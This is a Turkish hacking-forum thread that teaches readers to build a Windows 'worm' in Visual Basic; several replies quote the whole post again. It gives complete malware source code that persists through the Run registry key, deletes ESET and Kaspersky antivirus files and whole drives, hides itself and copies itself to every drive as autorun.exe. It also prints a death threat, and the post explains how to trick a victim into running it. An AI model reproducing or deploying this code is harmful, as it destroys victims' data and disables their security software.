Worm (solucan) Virüsü Yapımı

kskhack

Üye
25 Mar 2015
97
0
KARŞIYAKA
selamün aleyküm size bugün Worm virüsü yapımını anlatacağım bazı yerler alıntı bazı yerler ise kendi yazımdır. Forumda çok fazla Web Hack üzerine yoğunlaşma var bende bu yoğunlaşmayı birazda virüs yapma gibi konulara çekmeye çalışacağım.Değişik bilgiler paylaşacağım,fazla uzattım geçelim yapmaya;

Arkadaşlar solucanlar karşı tarafa sizin belirlediğiniz komutları vererek delik açar ve bir daha ki gelişiniz için hazır tutar.Hatta kendini kopyalayarak sisteme yayılır.Solucanı tanımlamak sabaha kadar sürer ama bende daha yeni yeni işin sırrını çözmekteyim.Size bir araya getirdiğim kodları vererek ışık tutmaya çalışacağım.Öncelikle kodu tamamen bir göstereyim.

Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe"
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kendiniz benim kodlarımla bir solucan oluşturmak istiyorsanız forma aynen bunları yapıştırın.Yok biz açıklamasını istiyoruz.Kendimiz komutlandırmak istiyoruz derseniz aşağıyı okuyun.


Arkadaşlar kodları bir ele alalım.Yapacağımız solucanın ile komutu şu:


Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"

Şu anlama geliyor.Kurban yaptığımız solucanı açınca regedit kayıtlarına solucan kendisini ekleyor.Böylece Windowsla birlikte kendini başlatıyor.Eğer yapacağınız solucan sistemle başlasın diyorsanız bu kodu ekleyin.

İkinci Kod:


Kod:
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide

Burada ise Solucan Eset ve Kaspersky ın dosyalarını silerek yolunu açıyor.Ayrıca kendini görev çubuğundan gizliyor.

Diğer Kod:


Kod:
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "C:\\WINDOWS\\system.exe

Burada ise birisi solucanı kapatırsa kapanmıyor.İkincisi Kendini Windowsun çeşitli klasörlerine ve sürücülerine kopyalıyor.Fakat burda önemli bir şeyde şu.Siz solucanı adama yedirmek için virüsü masaüstünde adama tıklatmanız lazım.Yada .rar yapıp adam tıkladığı zaman başlangıç klasörüne gitmesi lazım.Onun için adı system.exe olması gerekir başka bir ad ile olmaz

Diğer bir kod:

Kod:
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kodlar burada bitiyor.Son kısımdaki yer ise adama korku salmak.Kendi Kendine resimler açıyor tabi bunu değiştirebilirsiniz. Shell yazan kısmın devamından değişir.

İşte bu kadar siz dediklerimi yaparsanız ufak ve her tarafa bulaşan flash v.b bir solucan(worm) yapabilirsiniz.Ama benim kodlarımlada direk yapabilirsiniz.Bide unutmadan Formun visible özelligi False olsun ve ShowİnTaskbar da false olsun ki adam göremesin.

Bu kodlar dışında bilgi vermek de istiyorum.Worm virüsü çok güzel bir virüstür aslında,bu virüs sizin yaratıcılığınıza kalmış.Mesela Klonlama özelliği yerleştirirseniz her yere kendini klonlar kullanıcı birini silse on tane daha var. İnternette de bir sürü Solucan virüsü var aslında mesela çoğu kimsenin neden çıktığını bilmediği reklamlar da bir Worm virüsü aslında aşağıda örneklerini verdim.

İnternette sörf yaparken karşımıza çıkan küçük pencerelerde ilgi çekici şeyler bulunmaktadır. Bunlara tıkladığımızda solucan virüsü taşıyan dosyalar indirir. Tıkladığımız andan itibaren virüs bilgisayarımızda etkinleşir. Bazı penceredeki yazıların örnekleri;
Tebrikler 250 sms kazandınız telefonunuza indirmek için tıklayınız.
Tebrikler Amerika'ya gitme hakkını yakalamak için ücretsiz çekiliş kazandınız.
Tebrikler Amerika kapınızda.
Visa kartınıza bonus kazandınız.
Sitemize giren 1.000.000. kişisiniz. Bizden hediye şarkı kazandınız.
Bugün şanslı gününüzdesiniz. Bizden para ödülü kazandınız.
Tebrikler bizden saat kazandınız.
Değerli yorumlarınızı ve fikirlerinizi bekliyorum. Bu yazıların bazıları alıntıdır. Ama alıntı olarak tıpa tıp aynısını yazmadım bazı dokunuşlar yaptım düzeltmeler ve eklemeler yaptım.

İyi Forumlar...
kSKHACK HERYERDE!!
 

Silver Rookie

Yeni üye
8 Ocak 2017
35
0
Ve Aleyküm Selam.
Elllerine sağlık. Bunu VS2015'de yapabiliyormuyuz yoksa VB mi gerekli.
 
Son düzenleme:

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
selamün aleyküm size bugün Worm virüsü yapımını anlatacağım bazı yerler alıntı bazı yerler ise kendi yazımdır. Forumda çok fazla Web Hack üzerine yoğunlaşma var bende bu yoğunlaşmayı birazda virüs yapma gibi konulara çekmeye çalışacağım.Değişik bilgiler paylaşacağım,fazla uzattım geçelim yapmaya;

Arkadaşlar solucanlar karşı tarafa sizin belirlediğiniz komutları vererek delik açar ve bir daha ki gelişiniz için hazır tutar.Hatta kendini kopyalayarak sisteme yayılır.Solucanı tanımlamak sabaha kadar sürer ama bende daha yeni yeni işin sırrını çözmekteyim.Size bir araya getirdiğim kodları vererek ışık tutmaya çalışacağım.Öncelikle kodu tamamen bir göstereyim.

Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe"
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kendiniz benim kodlarımla bir solucan oluşturmak istiyorsanız forma aynen bunları yapıştırın.Yok biz açıklamasını istiyoruz.Kendimiz komutlandırmak istiyoruz derseniz aşağıyı okuyun.


Arkadaşlar kodları bir ele alalım.Yapacağımız solucanın ile komutu şu:


Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"

Şu anlama geliyor.Kurban yaptığımız solucanı açınca regedit kayıtlarına solucan kendisini ekleyor.Böylece Windowsla birlikte kendini başlatıyor.Eğer yapacağınız solucan sistemle başlasın diyorsanız bu kodu ekleyin.

İkinci Kod:


Kod:
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide

Burada ise Solucan Eset ve Kaspersky ın dosyalarını silerek yolunu açıyor.Ayrıca kendini görev çubuğundan gizliyor.

Diğer Kod:


Kod:
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "C:\\WINDOWS\\system.exe

Burada ise birisi solucanı kapatırsa kapanmıyor.İkincisi Kendini Windowsun çeşitli klasörlerine ve sürücülerine kopyalıyor.Fakat burda önemli bir şeyde şu.Siz solucanı adama yedirmek için virüsü masaüstünde adama tıklatmanız lazım.Yada .rar yapıp adam tıkladığı zaman başlangıç klasörüne gitmesi lazım.Onun için adı system.exe olması gerekir başka bir ad ile olmaz

Diğer bir kod:

Kod:
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kodlar burada bitiyor.Son kısımdaki yer ise adama korku salmak.Kendi Kendine resimler açıyor tabi bunu değiştirebilirsiniz. Shell yazan kısmın devamından değişir.

İşte bu kadar siz dediklerimi yaparsanız ufak ve her tarafa bulaşan flash v.b bir solucan(worm) yapabilirsiniz.Ama benim kodlarımlada direk yapabilirsiniz.Bide unutmadan Formun visible özelligi False olsun ve ShowİnTaskbar da false olsun ki adam göremesin.

Bu kodlar dışında bilgi vermek de istiyorum.Worm virüsü çok güzel bir virüstür aslında,bu virüs sizin yaratıcılığınıza kalmış.Mesela Klonlama özelliği yerleştirirseniz her yere kendini klonlar kullanıcı birini silse on tane daha var. İnternette de bir sürü Solucan virüsü var aslında mesela çoğu kimsenin neden çıktığını bilmediği reklamlar da bir Worm virüsü aslında aşağıda örneklerini verdim.

İnternette sörf yaparken karşımıza çıkan küçük pencerelerde ilgi çekici şeyler bulunmaktadır. Bunlara tıkladığımızda solucan virüsü taşıyan dosyalar indirir. Tıkladığımız andan itibaren virüs bilgisayarımızda etkinleşir. Bazı penceredeki yazıların örnekleri;
Tebrikler 250 sms kazandınız telefonunuza indirmek için tıklayınız.
Tebrikler Amerika'ya gitme hakkını yakalamak için ücretsiz çekiliş kazandınız.
Tebrikler Amerika kapınızda.
Visa kartınıza bonus kazandınız.
Sitemize giren 1.000.000. kişisiniz. Bizden hediye şarkı kazandınız.
Bugün şanslı gününüzdesiniz. Bizden para ödülü kazandınız.
Tebrikler bizden saat kazandınız.
Değerli yorumlarınızı ve fikirlerinizi bekliyorum. Bu yazıların bazıları alıntıdır. Ama alıntı olarak tıpa tıp aynısını yazmadım bazı dokunuşlar yaptım düzeltmeler ve eklemeler yaptım.

İyi Forumlar...
kSKHACK HERYERDE!!
(y) (y) (y)
 

mehmet0b0

Yeni üye
19 Şub 2021
3
0
ben bunu flash bellek üzerine atıp taktığım cihaza direkt bulaşıyo mu yoksa masa üstüne taşımam gerekli mi
 

Homax

Üye
9 Ocak 2023
64
16
selamün aleyküm size bugün Worm virüsü yapımını anlatacağım bazı yerler alıntı bazı yerler ise kendi yazımdır. Forumda çok fazla Web Hack üzerine yoğunlaşma var bende bu yoğunlaşmayı birazda virüs yapma gibi konulara çekmeye çalışacağım.Değişik bilgiler paylaşacağım,fazla uzattım geçelim yapmaya;

Arkadaşlar solucanlar karşı tarafa sizin belirlediğiniz komutları vererek delik açar ve bir daha ki gelişiniz için hazır tutar.Hatta kendini kopyalayarak sisteme yayılır.Solucanı tanımlamak sabaha kadar sürer ama bende daha yeni yeni işin sırrını çözmekteyim.Size bir araya getirdiğim kodları vererek ışık tutmaya çalışacağım.Öncelikle kodu tamamen bir göstereyim.

Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe"
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kendiniz benim kodlarımla bir solucan oluşturmak istiyorsanız forma aynen bunları yapıştırın.Yok biz açıklamasını istiyoruz.Kendimiz komutlandırmak istiyoruz derseniz aşağıyı okuyun.


Arkadaşlar kodları bir ele alalım.Yapacağımız solucanın ile komutu şu:


Kod:
Private Sub Form_Load()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\ \CURRENTVERSION\\RUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"

Şu anlama geliyor.Kurban yaptığımız solucanı açınca regedit kayıtlarına solucan kendisini ekleyor.Böylece Windowsla birlikte kendini başlatıyor.Eğer yapacağınız solucan sistemle başlasın diyorsanız bu kodu ekleyin.

İkinci Kod:


Kod:
On Error Resume Next
Kill "C:\\Program Files\\ESET"
Kill ("C:\\Program Files\\ESET")
Kill "C:\\Program Files\\Kaspersky\\*.*"
Kill "C:\\WINDOWS\\security\\*.*"
Kill "H:\\*.*"
Kill "C:\\********s and Settings\\All Users\\Desktop\\*.*"
Kill ("C:\\Program files\\Eset\\*.*")
App.TaskVisible = False
Visible = False
Me.Hide

Burada ise Solucan Eset ve Kaspersky ın dosyalarını silerek yolunu açıyor.Ayrıca kendini görev çubuğundan gizliyor.

Diğer Kod:


Kod:
on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject
Shell App.Path + "/" + App.EXEName + ".exe"
On Error Resume Next
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system32\\twainss.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\WINDOWS\\system\\clipboards.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "D:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "F:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "H:\\root.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "A:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "C:\\program data.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "B:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "E:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "I:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Start Menu\\Programlar\\Başlangıç\\system.exe", "K:\\system.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "F:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "G:\\autorun.exe"
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "I:\\system.exe
FileCopy "C:\\********s and Settings\\All Users\\Desktop\\system.exe", "C:\\WINDOWS\\system.exe

Burada ise birisi solucanı kapatırsa kapanmıyor.İkincisi Kendini Windowsun çeşitli klasörlerine ve sürücülerine kopyalıyor.Fakat burda önemli bir şeyde şu.Siz solucanı adama yedirmek için virüsü masaüstünde adama tıklatmanız lazım.Yada .rar yapıp adam tıkladığı zaman başlangıç klasörüne gitmesi lazım.Onun için adı system.exe olması gerekir başka bir ad ile olmaz

Diğer bir kod:

Kod:
On Error Resume Next
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
